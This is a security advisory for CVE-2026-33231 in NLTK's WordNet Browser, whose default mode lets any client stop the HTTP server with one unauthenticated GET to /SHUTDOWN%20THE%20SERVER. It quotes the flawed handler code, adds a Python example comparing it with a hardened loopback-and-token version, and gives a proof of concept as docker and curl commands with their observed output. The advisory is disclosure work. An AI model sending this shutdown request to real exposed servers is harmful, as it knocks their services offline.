PT-2026-26299 · Pypi · Nltk

Published 2026-03-19 · Updated 2026-03-19 · CVE-2026-33231

CVSS v3.1: 7.5 High (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Summary

The nltk.app.wordnet_app application allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A single GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os._exit(0), resulting in a denial of service.

Details

The vulnerable logic is in nltk/app/wordnet_app.py:
  • The server listens on all interfaces ([nltk/app/wordnet_app.py:242](/mnt/Data/my brains/test/nltk/nltk/app/wordnet_app.py#L242)):
    server = HTTPServer(("", port), MyServerHandler)
  • Incoming requests are checked for the exact path ([nltk/app/wordnet_app.py:87](/mnt/Data/my brains/test/nltk/nltk/app/wordnet_app.py#L87)):
    if unquote_plus(sp) == "SHUTDOWN THE SERVER":
  • The shutdown protection depends only on server_mode ([nltk/app/wordnet_app.py:88](/mnt/Data/my brains/test/nltk/nltk/app/wordnet_app.py#L88)).
  • In the default mode (runBrowser=True, therefore server_mode=False), the handler terminates the process directly ([nltk/app/wordnet_app.py:93](/mnt/Data/my brains/test/nltk/nltk/app/wordnet_app.py#L93)):
    os._exit(0)
This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.
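As an added illustration (not NLTK's own code), the Python below models the shutdown decision described above and places a hardened variant beside it: the hardened handler binds to loopback only instead of ("", port), accepts the shutdown route only from a loopback client that presents a per-run secret in an assumed X-Shutdown-Token header, and performs a controlled server.shutdown() rather than os._exit(0). The route string and the server_mode semantics come from the advisory; the header name, the token scheme and the handler class are assumptions made for this example.

```python
"""Added example (not NLTK's own code): the WordNet Browser shutdown route as the
advisory describes it, beside a hardened variant a maintainer could adopt."""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote_plus

SHUTDOWN_PATH = "SHUTDOWN THE SERVER"  # path string compared by the real handler
LOOPBACK = ("127.0.0.1", "::1")


def vulnerable_decision(raw_path, server_mode):
    """Decision logic as the advisory describes it. In default mode
    (server_mode=False) a matching path leads straight to os._exit(0);
    returned here as a label so the interpreter is not actually killed."""
    sp = raw_path[1:]
    if unquote_plus(sp) == SHUTDOWN_PATH:
        return "refuse" if server_mode else "hard-exit"
    return "serve"


def hardened_decision(raw_path, client_ip, provided_token, expected_token):
    """Hardened logic (assumed, not the project's fix): the route only works
    from loopback, only with the per-run secret, and asks for a controlled
    shutdown instead of terminating the process."""
    sp = raw_path[1:]
    if unquote_plus(sp) != SHUTDOWN_PATH:
        return "serve"
    if client_ip not in LOOPBACK:
        return "refuse"
    if provided_token is None or expected_token is None:
        return "refuse"
    # constant-time comparison so the token cannot be guessed byte by byte
    if not secrets.compare_digest(provided_token.encode("utf-8"), expected_token.encode("utf-8")):
        return "refuse"
    return "graceful-shutdown"


class HardenedHandler(BaseHTTPRequestHandler):
    shutdown_token = None  # set once per process before serving

    def log_message(self, fmt, *args):  # keep the demo quiet
        pass

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        token = self.headers.get("X-Shutdown-Token")  # assumed header name
        action = hardened_decision(self.path, self.client_address[0], token, self.shutdown_token)
        if action == "graceful-shutdown":
            self._reply(200, b"Server shutting down\n")
            # shutdown() blocks until serve_forever exits, so it must run in another thread
            threading.Thread(target=self.server.shutdown, daemon=True).start()
        elif action == "refuse":
            self.send_error(403, "Shutdown not permitted")
        else:
            self._reply(200, b"WordNet browser placeholder page\n")


def demo():
    """Bind to loopback on an ephemeral port, send three GETs (plain page,
    shutdown without token, shutdown with token) and return their status codes."""
    HardenedHandler.shutdown_token = secrets.token_urlsafe(16)
    server = HTTPServer(("127.0.0.1", 0), HardenedHandler)  # loopback only, not ("", port)
    port = server.server_address[1]
    worker = threading.Thread(target=server.serve_forever, daemon=True)
    worker.start()

    def get(path, headers=None):
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request("GET", path, headers=headers or {})
        status = conn.getresponse().status
        conn.close()
        return status

    statuses = [
        get("/"),
        get("/SHUTDOWN%20THE%20SERVER"),
        get("/SHUTDOWN%20THE%20SERVER", {"X-Shutdown-Token": HardenedHandler.shutdown_token}),
    ]
    worker.join(timeout=5)   # serve_forever returns once shutdown() has been honoured
    server.server_close()
    return statuses


if __name__ == "__main__":
    print(demo())
```

Running the file starts the hardened server on a loopback ephemeral port and prints the three status codes, 200 for the page, 403 for the unauthenticated shutdown attempt and 200 for the tokenised one, after which the server stops cleanly instead of exiting the interpreter with status 0. The loopback bind alone would already remove the remote reachability the advisory's CVSS vector (AV:N) rests on; the token guards against other local users and against browser-originated requests.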

PoC

  1. Start the WordNet Browser in Docker in its default mode:

```shell
docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \
  nltk-sandbox \
  python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)"
```

  2. Confirm the service is reachable:

```shell
curl -s -o /tmp/wn_before.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
```

Observed result:

```
200
```

  3. Trigger shutdown:

```shell
curl -s -o /tmp/wn_shutdown.html -w '%{http_code}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'
```

Observed result:

```
000
```

  4. Verify the service is no longer available:

```shell
curl -s -o /tmp/wn_after.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}'
docker logs nltk-wordnet-web-default-retest
```

Observed results:

```
000
nltk-wordnet-web-default-retest  Exited (0)
Server shutting down!
```

Impact

This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
  • the route is accessible over HTTP
  • no authentication or CSRF-style confirmation is required
  • the server listens on all interfaces by default
  • the process exits immediately instead of performing a controlled shutdown
This primarily affects users who run nltk.app.wordnet_app and expose or otherwise allow access to its listening port.

Fix

Weakness Enumeration

Missing Authentication

Related Identifiers

CVE-2026-33231
GHSA-JM6W-M3J8-898G

Affected Products

Nltk